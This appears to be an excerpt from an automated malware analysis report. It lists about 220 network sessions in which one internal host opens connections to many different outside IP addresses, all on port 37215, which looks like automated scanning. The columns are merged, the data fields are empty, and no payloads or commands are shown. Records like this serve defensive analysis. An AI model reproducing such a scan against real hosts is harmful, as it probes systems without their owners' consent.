                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11330192.168.2.233687041.229.50.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11331192.168.2.234404441.111.208.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11332192.168.2.235051041.59.53.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11333192.168.2.234248441.91.93.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11334192.168.2.2347382197.36.251.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11335192.168.2.2352052196.0.194.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11336192.168.2.2348318113.50.57.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11337192.168.2.2344198190.143.97.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11338192.168.2.2338342188.158.241.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11339192.168.2.2335180197.245.37.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11340192.168.2.2344524157.123.156.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11341192.168.2.2348784157.212.1.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11342192.168.2.2355510157.121.195.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11343192.168.2.234936847.107.214.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11344192.168.2.2337946210.110.159.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11345192.168.2.2354322196.209.222.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11346192.168.2.234475041.143.86.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11347192.168.2.233838241.241.233.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11348192.168.2.235927641.226.111.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11349192.168.2.2354226191.136.131.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11350192.168.2.2334168197.148.97.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11351192.168.2.2345690157.59.133.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11352192.168.2.2352742197.11.57.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11353192.168.2.235560857.149.94.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11354192.168.2.2345886197.0.71.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11355192.168.2.2350484157.181.222.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11356192.168.2.2335822197.215.175.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11357192.168.2.233905441.59.88.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11358192.168.2.2359658196.99.217.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11359192.168.2.2359204197.191.146.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11360192.168.2.2357360207.204.104.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11361192.168.2.235024641.206.1.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11362192.168.2.2341326197.220.177.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11363192.168.2.2337694197.75.243.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11364192.168.2.2337480140.213.252.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11365192.168.2.2353372197.188.84.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11366192.168.2.235820441.25.235.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11367192.168.2.2348682157.119.215.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11368192.168.2.2343840197.253.15.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11369192.168.2.233522449.221.74.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11370192.168.2.2335602193.22.228.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11371192.168.2.2343714147.154.32.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11372192.168.2.2360278131.149.110.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11373192.168.2.2341506157.49.32.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11374192.168.2.234189041.155.10.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11375192.168.2.2340580197.93.32.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11376192.168.2.235401641.235.106.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11377192.168.2.2357146158.204.235.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11378192.168.2.2359554197.47.138.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11379192.168.2.235195441.126.189.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11380192.168.2.2355630157.220.110.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11381192.168.2.2333976130.213.248.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11382192.168.2.236082641.93.170.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11383192.168.2.2354456197.222.0.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11384192.168.2.234839241.5.68.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11385192.168.2.2344814197.159.181.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11386192.168.2.235009241.190.136.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11387192.168.2.2338416157.73.13.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11388192.168.2.2353112157.136.40.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11389192.168.2.235274641.44.132.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11390192.168.2.2354090157.129.12.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11391192.168.2.2356872157.74.155.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11392192.168.2.2340674157.104.29.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11393192.168.2.2341002197.150.150.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11394192.168.2.2350368197.217.105.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11395192.168.2.2342318197.89.133.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11396192.168.2.2359334197.241.208.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11397192.168.2.2346586197.33.72.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11398192.168.2.2335632197.43.84.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11399192.168.2.2353568217.53.140.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11400192.168.2.2339694173.42.4.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11401192.168.2.2355858157.76.114.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11402192.168.2.2335444197.155.130.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11403192.168.2.2359398178.194.118.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11404192.168.2.233362641.6.78.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11405192.168.2.234314841.239.253.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11406192.168.2.235275441.135.31.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11407192.168.2.2334410197.65.154.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11408192.168.2.2351756171.62.174.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11409192.168.2.235303841.144.137.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11410192.168.2.2355930197.62.123.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11411192.168.2.23338941.71.124.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11412192.168.2.2340262157.207.202.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11413192.168.2.2339348132.93.161.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11414192.168.2.2336876197.220.215.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11415192.168.2.233708441.140.133.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11416192.168.2.2339988197.56.83.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11417192.168.2.2360880148.160.142.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11418192.168.2.2345360197.3.214.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11419192.168.2.2344054138.52.245.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11420192.168.2.2348422197.173.48.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11421192.168.2.2337766216.127.32.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11422192.168.2.234303441.57.82.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11423192.168.2.2343360157.68.27.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11424192.168.2.2353704113.21.141.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11425192.168.2.235403841.17.123.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11426192.168.2.2338708197.116.123.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11427192.168.2.2334218157.82.159.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11428192.168.2.2338122197.93.1.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11429192.168.2.2358136197.78.180.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11430192.168.2.2335432157.6.112.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11431192.168.2.233388841.40.32.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11432192.168.2.233833041.129.162.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11433192.168.2.233593441.2.103.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11434192.168.2.2352634157.229.167.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11435192.168.2.2337974197.242.61.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11436192.168.2.2342158197.125.72.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11437192.168.2.2336882157.79.138.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11438192.168.2.2346438197.116.61.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11439192.168.2.2342242197.82.131.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11440192.168.2.234558841.123.245.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11441192.168.2.2335516139.185.210.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11442192.168.2.2334734157.155.181.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11443192.168.2.235943441.243.123.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11444192.168.2.2336372197.47.128.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11445192.168.2.2354878157.69.197.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11446192.168.2.2358702140.106.113.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11447192.168.2.234819875.37.21.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11448192.168.2.235721050.94.6.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11449192.168.2.235939641.164.190.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11450192.168.2.2348574157.166.109.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11451192.168.2.2349572197.145.113.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11452192.168.2.234605641.61.177.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11453192.168.2.2353426157.51.63.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11454192.168.2.2344058165.158.77.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11455192.168.2.2337476197.34.224.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11456192.168.2.233712474.152.201.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11457192.168.2.234099241.51.19.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11458192.168.2.233681841.119.143.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11459192.168.2.234153241.72.133.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11460192.168.2.2355860197.160.216.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11461192.168.2.2335804197.12.102.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11462192.168.2.234107641.227.211.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11463192.168.2.235012242.8.246.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11464192.168.2.2348512157.18.187.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11465192.168.2.2352206157.5.241.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11466192.168.2.2344326203.49.77.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11467192.168.2.2336792157.73.135.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11468192.168.2.2339284157.180.224.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11469192.168.2.233593441.230.144.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11470192.168.2.2333380197.251.27.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11471192.168.2.233678441.10.104.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11472192.168.2.235364441.29.212.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11473192.168.2.2359254197.66.85.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11474192.168.2.2337302157.240.154.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11475192.168.2.235124441.245.160.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11476192.168.2.234403041.148.151.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11477192.168.2.2339724157.98.105.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11478192.168.2.234840841.182.204.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11479192.168.2.2354032205.138.49.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11480192.168.2.235077668.146.111.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11481192.168.2.2351124157.216.131.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11482192.168.2.2333752209.19.236.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11483192.168.2.2353224197.2.243.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11484192.168.2.2333506197.155.221.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11485192.168.2.235805041.35.102.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11486192.168.2.234121641.171.195.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11487192.168.2.2352904197.212.159.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11488192.168.2.235134641.189.90.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11489192.168.2.2355086157.19.100.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11490192.168.2.235441848.176.158.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11491192.168.2.234263054.136.96.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11492192.168.2.233887041.255.96.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11493192.168.2.2340702197.138.193.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11494192.168.2.2335654197.179.35.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11495192.168.2.2348536157.54.41.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11496192.168.2.2347746157.77.100.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11497192.168.2.235752841.239.98.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11498192.168.2.2349086197.119.63.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11499192.168.2.235099641.210.193.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11500192.168.2.2345046157.69.187.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11501192.168.2.234774841.211.91.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11502192.168.2.2355796157.70.21.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11503192.168.2.2346222157.151.206.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11504192.168.2.233481424.52.200.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11505192.168.2.233805441.175.172.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11506192.168.2.235411636.72.97.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11507192.168.2.2345094197.55.45.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11508192.168.2.2334558197.211.237.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11509192.168.2.2354324157.182.197.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11510192.168.2.233733441.14.30.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11511192.168.2.2341268197.252.29.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11512192.168.2.2359998197.110.175.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11513192.168.2.2356344197.101.101.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11514192.168.2.2352168160.3.112.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11515192.168.2.233571465.162.11.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11516192.168.2.2334206197.90.209.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11517192.168.2.2345582177.3.203.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11518192.168.2.2343440115.128.248.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11519192.168.2.2360212197.77.3.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11520192.168.2.2355058176.52.10.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11521192.168.2.2353186157.39.7.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11522192.168.2.2358430157.51.140.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11523192.168.2.2345374197.0.158.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11524192.168.2.235248250.244.217.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11525192.168.2.234678441.254.166.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11526192.168.2.2354754197.47.110.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11527192.168.2.234895441.245.28.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11528192.168.2.2355362157.114.44.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11529192.168.2.235755441.211.147.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11530192.168.2.233385641.86.160.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11531192.168.2.2334370157.128.182.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11532192.168.2.2349572135.159.50.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11533192.168.2.235740841.190.173.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11534192.168.2.235162041.140.132.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11535192.168.2.235710220.232.179.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11536192.168.2.2359582197.51.153.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11537192.168.2.2347476197.224.8.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11538192.168.2.235804674.1.80.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11539192.168.2.2359430157.43.152.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11540192.168.2.2334038113.135.136.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11541192.168.2.233480041.114.96.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11542192.168.2.2338036157.115.157.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11543192.168.2.2336934197.255.5.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11544192.168.2.2343788157.48.61.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11545192.168.2.2348756197.189.28.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11546192.168.2.2354470122.27.156.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11547192.168.2.2353330155.254.236.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
